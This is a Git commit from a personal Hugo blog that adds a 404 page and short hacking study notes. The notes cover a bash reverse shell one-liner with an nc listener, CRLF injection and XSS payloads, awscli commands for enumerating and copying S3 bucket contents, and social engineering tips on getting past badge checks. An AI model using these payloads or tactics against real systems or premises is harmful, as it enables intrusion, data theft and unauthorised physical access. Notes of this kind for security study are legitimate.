casual/Casual_blog
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

test custom 404

Browse Source
This commit is contained in:
casual 2024-09-03 22:36:04 +03:00
parent 321024f22f
commit f0d74bda0e
5 changed files with 174 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
content/404.md Normal file
View File

@ -0,0 +1,23 @@
---
title: "[Error 404](/)"
hidden: true
noindex: true
layout: page
---
Hi! Sorry but link doesn't exist yet.
![](https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif)
<!-- TODO download, upscale, host here - https://tenor.com/view/cat-loading-error-gif-19814836-->
It may be still in work or not posted yet.
If this link doesn't work for 1+ weeks, please contact me!
<!-- &nbsp; -->
<!-- &nbsp; -->
<!-- -->
<!-- [Take me home!](/) -->
<!-- thanks https://moonbooth.com/hugo/custom-404/ for guide -->

9
content/hacking/HowTo_Bash_reverseShell.md Normal file
View File

@ -0,0 +1,9 @@
+++
title = 'HowTo Bash ReverseShell'
date = 2024-09-04
+++
Listener - `nc -l 8081`
Reverse shell - `bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1`
May not work on hardened systems/containers.

26
content/hacking/HowTo_CRLF.md Normal file
View File

@ -0,0 +1,26 @@
+++
title = 'HowTo CRLF'
date = 2024-09-18
+++
Mostly fixed thing! May occure in some handwritten web-servers<!--more-->
CRLF - Carriege Return (\r) Line Feed (\n) (or %0d %0a)
Inserting \r\n into URL allow attacker to:
- log splitting - to insert logs to server that may decieve administrator
- HTTP response slpitting - Allows to add HTTP headers to the HTTP response <!-- TODO how does it work? -->
- XSS - `www.target.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E` - disables XSS protection, set location to custom (but does it work without 302/201 status???), sets html content-type and injects javascript.
- cookie injection
- check another note
For example:
`GET /%0d%0aSet-Cookie:CRLFInjection=PreritPathak HTTP/1.1`
Will add `Set-Cookie:CRLFInjection=PreritPathak` header to HTTP response
{{< source >}}
https://www.geeksforgeeks.org/crlf-injection-attack/
{{< /source >}}

84
content/hacking/HowTo_S3.md Normal file
View File

@ -0,0 +1,84 @@
+++
title = 'HowTo hack S3'
date = 2024-09-25
draft = true
+++
TODO ME
## What is S3?
### Abstract
S3 (Amazon Simple Storage Service) - object storage. You can think of it as cloud storage but designed for **storing and retrieving large files**. E.g. backups, archives, big data analytics, content distribution, and static website content.
S3 can be selfhosted (but you probably shouldn't do it). In other cases, company probably will use Amazon's S3.
S3 have "buckets" - container/folder for files.
### Technical
Interaction with S3 happens via RESTful API (`aws s3`).
Each bucket have its own settings:
- Region - each bucket is created in specific AWS region (for performance) - e.g. `https://<bucket-name>.s3.<region>.amazonaws.com/image.png`
- Name - each name should be unique across all AWS regions
- Storage class - how fast data can be accessed
- Lifecycle management - data can automatically be deleted or transfered to cheaper storage
- Versioning - S3 can keep snapshots of data
- Logging/monitoring
- Access control - the most interesting part for us. S3 have **public** and **private** buckets:
- In public bucket - any user can list content
- In private bucket - you should have credentials which have access to specific file
## Recon
### Find bucket endpoint
1. Try [Wappalyzer](https://www.wappalyzer.com/apps/)
2. [Spider](/hidden/todo/) site - `katana -js`
3. Search
### Find credentials
## Enumerate
Automatically:
https://github.com/sa7mon/S3Scanner
## Manually connect to S3
awscli:
```
aws configure
*написать что либо, в идеале легальный логин и пароль*
aws --endpoint=http://s3.smth.com s3 ls # list buckets
aws --endpoint=http://s3.smth.com s3 ls s3://smth # list files
aws s3 ls s3://whateverbucketname
aws --endpoint=http://s3.smth.com s3 cp smth s3://smth # upload
aws s3 mv Exploit.txt s3://whateverbucketname/
aws --endpoint=http://s3.smth.com s3 cp s3://smth # download
aws s3 cp s3://whateverbucketname/secret.txt
```
## Resources
- https://buckets.grayhatwarfare.com, a list with already discovered open buckets.
## Train
- http://flaws.cloud/
- http://flaws2.cloud/
{{< source >}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#looking-for-vulnerabilities-2
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#s3-buckets
https://freedium.cfd/https//medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Finfosecwriteups.com%2Ffinding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4
{{< /source >}}

32
content/hacking/HowTo_learn_SocialEngineering.md Normal file
View File

@ -0,0 +1,32 @@
+++
title = 'HowTo learn Social Engineering'
date = 2024-09-11
+++
<!-- TODO xkcd meme -->
Social Engineering - its **Social** skills + Events **Engineering**<!--more-->
How to learn Social Engineering:
- Create new __Identity__ - "Today I will be Jack the electrician"
- Just start interact with **all** people
- Don't start speaking with same route: "Hello, I'm Jack, Who are you", do it differently every time
- Go pick up girls ~~and touch grass~~
- Especially speak with people you are uncomfortable with
- You need to have uncomfortable situations to master you being in stressful situations
- If they invite you to something weird that you usually don't want to do - Do it
- If you have to present something as a proof of your belonging in place where you shouldn't be - Don't show it.
Make your work office - penetretion testing lab
- Is there bage required? - Do not wear it and make some excuse. Talk your way out
Books for Social skill:
- "Built for Growth" - Chris Kuenne,
- "Coaching Habit" - Michael Stanier Bungay
{{< source >}}
https://www.youtube.com/watch?v=CldNso156QY
{{< /source >}}